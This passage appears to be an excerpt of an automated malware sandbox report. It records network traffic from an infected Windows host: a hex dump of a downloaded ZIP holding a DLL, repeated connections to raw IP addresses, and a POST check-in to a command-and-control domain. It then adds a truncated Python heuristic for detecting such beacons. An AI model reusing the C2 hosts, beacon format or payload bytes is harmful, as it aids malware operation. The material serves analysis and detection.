0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 199<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL / was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr><address>Apache/2.4.29 (Ubuntu) Server at host-data-coin-11.com Port 80</address></body></html>0
                          Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.20.1Date: Fri, 14 Jan 2022 11:30:22 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: closeData Raw: 31 39 39 0d 0a 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 32 39 20 28 55 62 75 6e 74 75 29 20 53 65 72 76 65 72 20 61 74 20 68 6f 73 74 2d 64 61 74 61 2d 63 6f 69 6e 2d 31 31 2e 63 6f 6d 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 199<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL / was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr><address>Apache/2.4.29 (Ubuntu) Server at host-data-coin-11.com Port 80</address></body></html>0
                          Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.20.1Date: Fri, 14 Jan 2022 11:30:22 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: closeData Raw: 31 39 39 0d 0a 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 32 39 20 28 55 62 75 6e 74 75 29 20 53 65 72 76 65 72 20 61 74 20 68 6f 73 74 2d 64 61 74 61 2d 63 6f 69 6e 2d 31 31 2e 63 6f 6d 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 199<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL / was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr><address>Apache/2.4.29 (Ubuntu) Server at host-data-coin-11.com Port 80</address></body></html>0
                          Source: global trafficHTTP traffic detected: HTTP/1.1 200 OKServer: nginx/1.18.0 (Ubuntu)Date: Fri, 14 Jan 2022 11:30:29 GMTContent-Type: application/octet-streamContent-Length: 2828315Connection: keep-aliveLast-Modified: Fri, 07 Jan 2022 23:09:57 GMTETag: "61d8c845-2b281b"Accept-Ranges: bytesData Raw: 50 4b 03 04 14 00 00 00 08 00 9a 7a 6e 4e 3c 09 f8 7b 72 d2 00 00 d0 69 01 00 0b 00 00 00 6e 73 73 64 62 6d 33 2e 64 6c 6c ec fd 7f 7c 14 d5 d5 38 00 cf ee 4e 92 0d 59 d8 05 36 18 24 4a 90 a0 d1 a0 06 16 24 31 80 d9 84 dd 44 20 b0 61 c9 2e 11 13 b4 6a 4c b7 56 f9 b1 43 b0 12 08 4e 02 3b 19 b7 f5 e9 a3 7d ec 2f ab f5 f1 e9 0f db a7 b6 b5 80 d5 ea 86 d8 24 f8 13 81 5a 2c 54 a3 52 bd 71 63 8d 92 86 45 63 e6 3d e7 dc 99 dd 0d da ef f7 fb be 7f bf f0 c9 ec cc dc 3b f7 9e 7b ee b9 e7 9e 73 ee b9 e7 d6 de 70 bf 60 11 04 41 84 3f 4d 13 84 83 02 ff 57 21 fc df ff e5 99 04 61 ca ec 3f 4e 11 9e ca 7e 65 ce 41 d3 ea 57 e6 ac 6f f9 fa b6 82 cd 5b ef ba 7d eb cd df 2c b8 e5 e6 3b ef bc 2b 5c f0 b5 db 0a b6 4a 77 16 7c fd ce 82 15 6b fd 05 df bc eb d6 db ae 9a 3c 79 52 a1 5e c6 45 07 6f 18 6e 78 73 d1 63 c6 9f ef d1 9f 3d 56 0f bf ed cf 2c fe e9 46 f8 ed bb fb cc 63 75 f4 bc e4 a7 1b e8 77 c1 4f fd f4 5b f2 d3 75 f0 7b cf d3 3c df 77 ff b8 f8 a7 37 50 19 8b 1f 7b 91 9e 4b 7e ea a6 df 45 f4 dd 77 ff f8 d2 63 fc f7 1a 7a 5e f7 f5 5b 5a b0 be 7f d7 36 9f 47 10 56 9b 32 84 e7 2b ba 6e 34 de 0d 08 97 cc c9 31 4d c9 11 2e 84 86 97 f0 77 7b 66 c3 bd 03 6e 4a 4c f8 e8 a0 7b b3 20 64 0a f4 9c fc 15 da 4d 84 e4 2b b6 98 20 b9 82 7f e4 10 84 d4 2f ff 29 b8 ce 24 58 21 b5 08 b2 f4 e3 cb 9b 4c c2 0e 4b 1a 60 ab 4d c2 91 8b e0 77 b3 49 f8 ef 4c 41 38 72 ad 49 58 ff 7f e8 a3 a2 72 d3 c4 be 04 38 37 98 ff 7d fe ab c2 b7 ed 08 c3 ef e9 3c bd 5d 17 72 b8 d3 ff 15 00 54 57 6d bd f5 e6 f0 cd 82 b0 62 36 2f 13 5f 0a 17 9b d2 b3 61 bd 15 57 f1 6c 42 02 db e0 33 11 6e 84 e5 5f ca 17 bb 6a eb b6 ad b7 08 02 6f eb 4d 7a 9d 15 5f 51 de d6 db ee b8 eb 16 81 da 8e 38 10 ac f0 bb e2 
4b f9 2a 85 ff ff bf ff a7 7f f5 ea 90 bc ac c8 67 72 08 e1 4c b9 cd 2a 48 2e b5 d6 76 b6 fb 8b 84 36 5b 2a 92 bf e9 34 49 97 a8 dd 7b de 31 67 09 c2 3c 1c 02 3e 4d ca d3 24 47 9d 26 59 d9 8b d0 f7 f2 0b ce c6 1e 2d f7 a1 12 93 a3 4f 98 01 39 5c b1 c6 1e 2c 74 c8 e1 57 1b 6d ae 58 20 a8 b6 59 d5 33 ea 2a 87 e2 19 53 3c 23 7d 1e 22 85 3e cf 30 52 42 67 2c 9c 1d b2 6c 68 2e 73 8b e1 6f d8 0f b8 c5 e6 72 cf 70 38 13 ae 09 29 bf cf 33 82 1d 4b 0f 76 fb 01 93 eb 64 73 d9 8d 6e 33 14 2b 5d 07 8f f6 03 2b dc e3 ae c3 ed 6b 72 4d 75 01 5f 90 59 5c 82 a0 0e cb 2f 38 54 cf 18 96 0b af 06 26 0b 42 43 83 22 8d 75 8e da 3b be 0f 65 a9 6b 20 75 24 1e 81 cf 15 8f cd 7e 60 bd 7b 1c 21 ab 4d c8 09 f3 ae 5c 57 ac 59 a9 33 37 2b 6e 51 f5 5a 95 2a ab ea b1 c5 33 5c 47 15 bf 35 64 be a1 f8 90 5a 9f 68 56 4c cd ea 5a 1b 7c 6b 89 35 17 f7 ab 58 46 ac 59 1e cc 6c 56 56 57 9a d5 43 98 d8 7c bd fd 80 80 cf 62 fb aa 5c 93 5a 0f 95 87 6d 81 20 f3 03 30 f0 d4 d0 50 fe 46 38 7b 5d 90 55 11 70 da da 52 57 2c 6e 91 fb b5 4d 4d 1b d5 7f e8 c8 73 aa 1e c2 5f 40 b5 aa 3e 51
                          Source: unknownTCP traffic detected without corresponding DNS query: 185.186.142.166
                          Source: unknownTCP traffic detected without corresponding DNS query: 185.186.142.166
                          Source: unknownTCP traffic detected without corresponding DNS query: 185.186.142.166
                          Source: unknownTCP traffic detected without corresponding DNS query: 185.233.81.115
                          Source: unknownTCP traffic detected without corresponding DNS query: 185.233.81.115
                          Source: unknownTCP traffic detected without corresponding DNS query: 185.233.81.115
                          Source: unknownTCP traffic detected without corresponding DNS query: 185.233.81.115
                          Source: unknownTCP traffic detected without corresponding DNS query: 185.233.81.115
                          Source: unknownTCP traffic detected without corresponding DNS query: 185.233.81.115
                          Source: unknownTCP traffic detected without corresponding DNS query: 185.233.81.115
                          Source: unknownTCP traffic detected without corresponding DNS query: 185.233.81.115
                          Source: unknownTCP traffic detected without corresponding DNS query: 185.233.81.115
                          Source: unknownTCP traffic detected without corresponding DNS query: 185.7.214.171
                          Source: unknownTCP traffic detected without corresponding DNS query: 185.7.214.171
                          Source: unknownTCP traffic detected without corresponding DNS query: 185.7.214.171
                          Source: unknownTCP traffic detected without corresponding DNS query: 185.7.214.171
                          Source: unknownTCP traffic detected without corresponding DNS query: 185.7.214.171
                          Source: unknownTCP traffic detected without corresponding DNS query: 185.7.214.171
                          Source: unknownTCP traffic detected without corresponding DNS query: 185.7.214.171
                          Source: unknownTCP traffic detected without corresponding DNS query: 185.7.214.171
                          Source: unknownTCP traffic detected without corresponding DNS query: 185.7.214.171
                          Source: unknownTCP traffic detected without corresponding DNS query: 185.7.214.171
                          Source: unknownTCP traffic detected without corresponding DNS query: 185.7.214.171
                          Source: unknownTCP traffic detected without corresponding DNS query: 185.7.214.171
                          Source: unknownTCP traffic detected without corresponding DNS query: 185.7.214.171
                          Source: unknownTCP traffic detected without corresponding DNS query: 185.7.214.171
                          Source: unknownTCP traffic detected without corresponding DNS query: 185.7.214.171
                          Source: unknownTCP traffic detected without corresponding DNS query: 185.7.214.171
                          Source: unknownTCP traffic detected without corresponding DNS query: 185.7.214.171
                          Source: unknownTCP traffic detected without corresponding DNS query: 185.7.214.171
                          Source: unknownTCP traffic detected without corresponding DNS query: 185.7.214.171
                          Source: unknownTCP traffic detected without corresponding DNS query: 185.7.214.171
                          Source: unknownTCP traffic detected without corresponding DNS query: 185.7.214.171
                          Source: unknownTCP traffic detected without corresponding DNS query: 185.7.214.171
                          Source: unknownTCP traffic detected without corresponding DNS query: 185.7.214.171
                          Source: unknownTCP traffic detected without corresponding DNS query: 185.7.214.171
                          Source: unknownTCP traffic detected without corresponding DNS query: 185.7.214.171
                          Source: unknownTCP traffic detected without corresponding DNS query: 185.7.214.171
                          Source: unknownTCP traffic detected without corresponding DNS query: 185.7.214.171
                          Source: unknownTCP traffic detected without corresponding DNS query: 185.7.214.171
                          Source: unknownTCP traffic detected without corresponding DNS query: 185.7.214.171
                          Source: unknownTCP traffic detected without corresponding DNS query: 185.7.214.171
                          Source: unknownTCP traffic detected without corresponding DNS query: 185.7.214.171
                          Source: unknownTCP traffic detected without corresponding DNS query: 185.7.214.171
                          Source: unknownTCP traffic detected without corresponding DNS query: 185.7.214.171
                          Source: unknownTCP traffic detected without corresponding DNS query: 185.7.214.171
                          Source: unknownTCP traffic detected without corresponding DNS query: 185.7.214.171
                          Source: unknownTCP traffic detected without corresponding DNS query: 185.7.214.171
                          Source: unknownTCP traffic detected without corresponding DNS query: 185.7.214.171
                          Source: unknownTCP traffic detected without corresponding DNS query: 185.7.214.171
                          Source: svchost.exe, 00000016.00000003.797471360.000001A784BA0000.00000004.00000001.sdmpString found in binary or memory: Try it free for 30 days, no strings attached\r\n\r\nLike us on Facebook: http://www.facebook.com/spotify \r\nFollow us on Twitter: http://twitter.com/spotify","ProductTitle":"Spotify - Music and Podcasts","SearchTitles":[{"SearchTitleString":"Spotify","SearchTitleType":"SearchHint"},{"SearchTitleString":"Music","SearchTitleType":"SearchHint"},{"SearchTitleString":"music apps","SearchTitleType":"SearchHint"},{"SearchTitleString":"free music","SearchTitleType":"SearchHint"},{"SearchTitleString":"podcasts","SearchTitleType":"SearchHint"},{"SearchTitleString":"streaming","SearchTitleType":"SearchHint"},{"SearchTitleString":"soundcloud","SearchTitleType":"SearchHint"}],"Language":"en-us","Markets":["US","DZ","AR","AU","AT","BH","BD","BE","BR","BG","CA","CL","CN","CO","CR","HR","CY","CZ","DK","EG","EE","FI","FR","DE","GR","GT","HK","HU","IS","IN","ID","IQ","IE","IL","IT","JP","JO","KZ","KE","KW","LV","LB","LI","LT","LU","MY","MT","MR","MX","MA","NL","NZ","NG","N equals www.facebook.com (Facebook)
                          Source: svchost.exe, 00000016.00000003.797471360.000001A784BA0000.00000004.00000001.sdmpString found in binary or memory: Try it free for 30 days, no strings attached\r\n\r\nLike us on Facebook: http://www.facebook.com/spotify \r\nFollow us on Twitter: http://twitter.com/spotify","ProductTitle":"Spotify - Music and Podcasts","SearchTitles":[{"SearchTitleString":"Spotify","SearchTitleType":"SearchHint"},{"SearchTitleString":"Music","SearchTitleType":"SearchHint"},{"SearchTitleString":"music apps","SearchTitleType":"SearchHint"},{"SearchTitleString":"free music","SearchTitleType":"SearchHint"},{"SearchTitleString":"podcasts","SearchTitleType":"SearchHint"},{"SearchTitleString":"streaming","SearchTitleType":"SearchHint"},{"SearchTitleString":"soundcloud","SearchTitleType":"SearchHint"}],"Language":"en-us","Markets":["US","DZ","AR","AU","AT","BH","BD","BE","BR","BG","CA","CL","CN","CO","CR","HR","CY","CZ","DK","EG","EE","FI","FR","DE","GR","GT","HK","HU","IS","IN","ID","IQ","IE","IL","IT","JP","JO","KZ","KE","KW","LV","LB","LI","LT","LU","MY","MT","MR","MX","MA","NL","NZ","NG","N equals www.twitter.com (Twitter)
                          Source: svchost.exe, 00000016.00000003.797471360.000001A784BA0000.00000004.00000001.sdmp, svchost.exe, 00000016.00000003.797504069.000001A784BB1000.00000004.00000001.sdmpString found in binary or memory: Try it free for 30 days, no strings attached\r\n\r\nLike us on Facebook: http://www.facebook.com/spotify \r\nFollow us on Twitter: http://twitter.com/spotify","ProductTitle":"Spotify - Music and Podcasts","SearchTitles":[{"SearchTitleString":"Spotify","SearchTitleType":"SearchHint"},{"SearchTitleString":"Music","SearchTitleType":"SearchHint"},{"SearchTitleString":"music apps","SearchTitleType":"SearchHint"},{"SearchTitleString":"free music","SearchTitleType":"SearchHint"},{"SearchTitleString":"podcasts","SearchTitleType":"SearchHint"},{"SearchTitleString":"streaming","SearchTitleType":"SearchHint"},{"SearchTitleString":"soundcloud","SearchTitleType":"SearchHint"}],"Language":"en-us","Markets":["US","DZ","AR","AU","AT","BH","BD","BE","BR","BG","CA","CL","CN","CO","CR","HR","CY","CZ","DK","EG","EE","FI","FR","DE","GR","GT","HK","HU","IS","IN","ID","IQ","IE","IL","IT","JP","JO","KZ","KE","KW","LV","LB","LI","LT","LU","MY","MT","MR","MX","MA","NL","NZ","NG","NO","OM","PK","PE","PH","PL","PT","QA","RO","RU","SA","RS","SG","SK","SI","ZA","KR","ES","SE","CH","TW","TH","TT","TN","TR","UA","AE","GB","VN","YE","LY","LK","UY","VE","AF","AX","AL","AS","AO","AI","AQ","AG","AM","AW","BO","BQ","BA","BW","BV","IO","BN","BF","BI","KH","CM","CV","KY","CF","TD","TL","DJ","DM","DO","EC","SV","GQ","ER","ET","FK","FO","FJ","GF","PF","TF","GA","GM","GE","GH","GI","GL","GD","GP","GU","GG","GN","GW","GY","HT","HM","HN","AZ","BS","BB","BY","BZ","BJ","BM","BT","KM","CG","CD","CK","CX","CC","CI","CW","JM","SJ","JE","KI","KG","LA","LS","LR","MO","MK","MG","MW","IM","MH","MQ","MU","YT","FM","MD","MN","MS","MZ","MM","NA","NR","NP","MV","ML","NC","NI","NE","NU","NF","PW","PS","PA","PG","PY","RE","RW","BL","MF","WS","ST","SN","MP","PN","SX","SB","SO","SC","SL","GS","SH","K
N","LC","PM","VC","TJ","TZ","TG","TK","TO","TM","TC","TV","UM","UG","VI","VG","WF","EH","ZM","ZW","UZ","VU","SR","SZ","AD","MC","SM","ME","VA","NEUTRAL"]}],"MarketProperties":[{"RelatedProducts":[],"Markets":["US"]}],"ProductASchema":"Product;3","ProductBSchema":"ProductUnifiedApp;3","ProductId":"9NCBCSZSJRSB","Properties":{"PackageFamilyName":"SpotifyAB.SpotifyMusic_zpdnekdrzrea0","PackageIdentityName":"SpotifyAB.SpotifyMusic","PublisherCertificateName":"CN=453637B3-4E12-4CDF-B0D3-2A3C863BF6EF","XboxCrossGenSetId":null,"XboxConsoleGenOptimized":null,"XboxConsoleGenCompatible":null},"AlternateIds":[{"IdType":"LegacyWindowsStoreProductId","Value":"ceac5d3f-8a4f-40e1-9a67-76d9108c7cb5"},{"IdType":"LegacyWindowsPhoneProductId","Value":"caac1b9d-621b-4f96-b143-e10e1397740a"},{"IdType":"XboxTitleId","Value":"1681279293"}],"IngestionSource":"DCE","IsMicrosoftProduct":false,"PreferredSkuId":"0010","ProductType":"Application","ValidationData":{"PassedValidation":false,"RevisionId":"2022-01-07T11:33:20.1626869Z||.||d5cdcec3-04df-404e-ba07-3240047c89f9||1152921505694348672||Null||fullrelease","ValidationResultUri":""},"MerchandizingTags":[],"PartD":"","ProductFamily":"Apps","ProductKind":"Application","DisplaySkuAvailab
                          Source: svchost.exe, 00000016.00000003.797471360.000001A784BA0000.00000004.00000001.sdmp, svchost.exe, 00000016.00000003.797504069.000001A784BB1000.00000004.00000001.sdmpString found in binary or memory: Try it free for 30 days, no strings attached\r\n\r\nLike us on Facebook: http://www.facebook.com/spotify \r\nFollow us on Twitter: http://twitter.com/spotify","ProductTitle":"Spotify - Music and Podcasts","SearchTitles":[{"SearchTitleString":"Spotify","SearchTitleType":"SearchHint"},{"SearchTitleString":"Music","SearchTitleType":"SearchHint"},{"SearchTitleString":"music apps","SearchTitleType":"SearchHint"},{"SearchTitleString":"free music","SearchTitleType":"SearchHint"},{"SearchTitleString":"podcasts","SearchTitleType":"SearchHint"},{"SearchTitleString":"streaming","SearchTitleType":"SearchHint"},{"SearchTitleString":"soundcloud","SearchTitleType":"SearchHint"}],"Language":"en-us","Markets":["US","DZ","AR","AU","AT","BH","BD","BE","BR","BG","CA","CL","CN","CO","CR","HR","CY","CZ","DK","EG","EE","FI","FR","DE","GR","GT","HK","HU","IS","IN","ID","IQ","IE","IL","IT","JP","JO","KZ","KE","KW","LV","LB","LI","LT","LU","MY","MT","MR","MX","MA","NL","NZ","NG","NO","OM","PK","PE","PH","PL","PT","QA","RO","RU","SA","RS","SG","SK","SI","ZA","KR","ES","SE","CH","TW","TH","TT","TN","TR","UA","AE","GB","VN","YE","LY","LK","UY","VE","AF","AX","AL","AS","AO","AI","AQ","AG","AM","AW","BO","BQ","BA","BW","BV","IO","BN","BF","BI","KH","CM","CV","KY","CF","TD","TL","DJ","DM","DO","EC","SV","GQ","ER","ET","FK","FO","FJ","GF","PF","TF","GA","GM","GE","GH","GI","GL","GD","GP","GU","GG","GN","GW","GY","HT","HM","HN","AZ","BS","BB","BY","BZ","BJ","BM","BT","KM","CG","CD","CK","CX","CC","CI","CW","JM","SJ","JE","KI","KG","LA","LS","LR","MO","MK","MG","MW","IM","MH","MQ","MU","YT","FM","MD","MN","MS","MZ","MM","NA","NR","NP","MV","ML","NC","NI","NE","NU","NF","PW","PS","PA","PG","PY","RE","RW","BL","MF","WS","ST","SN","MP","PN","SX","SB","SO","SC","SL","GS","SH","K
N","LC","PM","VC","TJ","TZ","TG","TK","TO","TM","TC","TV","UM","UG","VI","VG","WF","EH","ZM","ZW","UZ","VU","SR","SZ","AD","MC","SM","ME","VA","NEUTRAL"]}],"MarketProperties":[{"RelatedProducts":[],"Markets":["US"]}],"ProductASchema":"Product;3","ProductBSchema":"ProductUnifiedApp;3","ProductId":"9NCBCSZSJRSB","Properties":{"PackageFamilyName":"SpotifyAB.SpotifyMusic_zpdnekdrzrea0","PackageIdentityName":"SpotifyAB.SpotifyMusic","PublisherCertificateName":"CN=453637B3-4E12-4CDF-B0D3-2A3C863BF6EF","XboxCrossGenSetId":null,"XboxConsoleGenOptimized":null,"XboxConsoleGenCompatible":null},"AlternateIds":[{"IdType":"LegacyWindowsStoreProductId","Value":"ceac5d3f-8a4f-40e1-9a67-76d9108c7cb5"},{"IdType":"LegacyWindowsPhoneProductId","Value":"caac1b9d-621b-4f96-b143-e10e1397740a"},{"IdType":"XboxTitleId","Value":"1681279293"}],"IngestionSource":"DCE","IsMicrosoftProduct":false,"PreferredSkuId":"0010","ProductType":"Application","ValidationData":{"PassedValidation":false,"RevisionId":"2022-01-07T11:33:20.1626869Z||.||d5cdcec3-04df-404e-ba07-3240047c89f9||1152921505694348672||Null||fullrelease","ValidationResultUri":""},"MerchandizingTags":[],"PartD":"","ProductFamily":"Apps","ProductKind":"Application","DisplaySkuAvailab
                          Source: FA5C.exe, 00000027.00000002.978852970.000000000301D000.00000004.00000001.sdmp, FA5C.exe, 00000027.00000002.953978581.0000000002EF4000.00000004.00000001.sdmpString found in binary or memory: l9https://www.facebook.com/chat/video/videocalldownload.php equals www.facebook.com (Facebook)
                          Source: FA5C.exe, 00000027.00000002.953978581.0000000002EF4000.00000004.00000001.sdmpString found in binary or memory: romium PDF Plugin","versions":[{"comment":"Chromium PDF Plugin has no version information.","status":"fully_trusted","version":"0"}]},"divx-player":{"group_name_matcher":"*DivX Web Player*","help_url":"https://support.google.com/chrome/?p=plugin_divx","lang":"en-US","mime_types":["video/divx","video/x-matroska"],"name":"DivX Web Player","url":"http://download.divx.com/player/divxdotcom/DivXWebPlayerInstaller.exe","versions":[{"status":"requires_authorization","version":"1.4.3.4"}]},"facebook-video-calling":{"group_name_matcher":"*Facebook Video*","lang":"en-US","mime_types":["application/skypesdk-plugin"],"name":"Facebook Video Calling","url":"https://www.facebook.com/chat/video/videocalldownload.php","versions":[{"comment":"We do not track version information for the Facebook Video Calling Plugin.","status":"requires_authorization","version":"0"}]},"google-chrome-pdf":{"group_name_matcher":"*Chrome PDF Viewer*","mime_types":[],"name":"Chrome PDF Viewer","versions":[{"comment":"Google Chrome PDF Viewer has no version information.","status":"fully_trusted","version":"0"}]},"google-chrome-pdf-plugin":{"group_name_matcher":"*Chrome PDF Plugin*","mime_types":[],"name":"Chrome PDF Plugin","versions":[{"comment":"Google Chrome PDF Plugin has no version information.","status":"fully_trusted","version":"0"}]},"google-earth":{"group_name_matcher":"*Google Earth*","lang":"en-US","mime_types":["application/geplugin"],"name":"Google Earth","url":"http://www.google.com/earth/explore/products/plugin.html","versions":[{"comment":"We do not track version information for the Google Earth Plugin.","status":"requires_authorization","version":"0"}]},"google-talk":{"group_name_matcher":"*Google Talk*","mime_types":[],"name":"Google Talk","versions":[{"comment":"'Google Talk Plugin' and 'Google Talk Plugin Video Accelerator' use two completely 
different versioning schemes, so we can't define a minimum version.","status":"requires_authorization","version":"0"}]},"google-update":{"group_name_matcher":"Google Update","mime-types":[],"name":"Google Update","versions":[{"comment":"Google Update plugin is versioned but kept automatically up to date","status":"requires_authorization","version":"0"}]},"ibm-java-runtime-environment":{"group_name_matcher":"*IBM*Java*","mime_types":["application/x-java-applet","application/x-java-applet;jpi-version=1.7.0_05","application/x-java-applet;version=1.1","application/x-java-applet;version=1.1.1","application/x-java-applet;version=1.1.2","application/x-java-applet;version=1.1.3","application/x-java-applet;version=1.2","application/x-java-applet;version=1.2.1","application/x-java-applet;version=1.2.2","application/x-java-applet;version=1.3","application/x-java-applet;version=1.3.1","application/x-java-applet;version=1.4","application/x-java-applet;version=1.4.1","application/x-java-applet;version=1.4.2","application/x-java-applet;version=1.5","application/x-java-applet;version=1.6","application/x-java-applet;version=1.7","application/x-j
                          Source: unknown; HTTP traffic detected:
                              POST / HTTP/1.1
                              Connection: Keep-Alive
                              Content-Type: application/x-www-form-urlencoded
                              Accept: */*
                              Referer: http://rrooukv.org/
                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                              Content-Length: 361
                              Host: host-data-coin-11.com
                          Source: unknown; HTTPS traffic detected: 185.233.81.115:443 -> 192.168.2.4:49791 version: TLS 1.2
                          Source: unknown; HTTPS traffic detected: 162.159.135.233:443 -> 192.168.2.4:49810 version: TLS 1.2
                          Source: unknown; HTTPS traffic detected: 172.67.139.105:443 -> 192.168.2.4:49876 version: TLS 1.2
                          Source: unknown; HTTPS traffic detected: 144.76.136.153:443 -> 192.168.2.4:49878 version: TLS 1.2
                          Source: unknown; HTTPS traffic detected: 144.76.136.153:443 -> 192.168.2.4:49886 version: TLS 1.2
                          Source: unknown; HTTPS traffic detected: 144.76.136.153:443 -> 192.168.2.4:49891 version: TLS 1.2
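The POST recorded above has a shape that can be scored mechanically: a form-encoded POST to the site root with a wildcard Accept, a Referer whose host differs from the Host header, an IE11/Trident user agent on Windows 10, and a small body. The Python below is an added example, not part of the Joe Sandbox report and not one of its Snort/ET rules: it parses a raw HTTP/1.1 request and counts those traits. The request text is the one recorded above, re-assembled as constructed input; the browser control request, the heuristics themselves and the cut-off are assumptions of this example.

```python
"""Heuristic triage of a raw HTTP request for loader-style check-in traits.

Added example; thresholds and heuristics are analyst assumptions, not IDS rules.
"""
from typing import Dict, List, NamedTuple
from urllib.parse import urlsplit

# Constructed sample input: the POST recorded in the report, one header per line.
SAMPLE_REQUEST = (
    "POST / HTTP/1.1\r\n"
    "Connection: Keep-Alive\r\n"
    "Content-Type: application/x-www-form-urlencoded\r\n"
    "Accept: */*\r\n"
    "Referer: http://rrooukv.org/\r\n"
    "User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko\r\n"
    "Content-Length: 361\r\n"
    "Host: host-data-coin-11.com\r\n"
    "\r\n"
)

# Constructed control case: an ordinary browser form submit (assumed, not from the report).
BROWSER_LOGIN_REQUEST = (
    "POST /login HTTP/1.1\r\n"
    "Host: example.com\r\n"
    "Referer: https://example.com/login\r\n"
    "Accept: text/html,application/xhtml+xml\r\n"
    "Content-Type: application/x-www-form-urlencoded\r\n"
    "Content-Length: 42\r\n"
    "User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/97.0 Safari/537.36\r\n"
    "\r\n"
)


class Request(NamedTuple):
    method: str
    target: str
    headers: Dict[str, str]  # header names lower-cased
    body: str


def parse_request(raw: str) -> Request:
    """Split a raw HTTP/1.x request into request line, headers and body."""
    head, _, body = raw.partition("\r\n\r\n")
    lines = head.split("\r\n")
    method, target, _version = lines[0].split(" ", 2)
    headers: Dict[str, str] = {}
    for line in lines[1:]:
        name, _, value = line.partition(":")
        if name:
            headers[name.strip().lower()] = value.strip()
    return Request(method, target, headers, body)


def beacon_indicators(req: Request) -> List[str]:
    """Names of the heuristics this request trips (assumed thresholds)."""
    h = req.headers
    hits: List[str] = []
    if req.method == "POST" and req.target == "/":
        hits.append("POST to site root")
    if h.get("content-type", "").startswith("application/x-www-form-urlencoded") and h.get("accept") == "*/*":
        hits.append("form-encoded POST with wildcard Accept (browser form submits send text/html)")
    ref_host = urlsplit(h.get("referer", "")).hostname
    host = h.get("host", "").split(":")[0]
    if ref_host and host and ref_host != host:
        hits.append("Referer host %s does not match Host %s" % (ref_host, host))
    ua = h.get("user-agent", "")
    if "Trident/7.0" in ua and "Windows NT 10.0" in ua:
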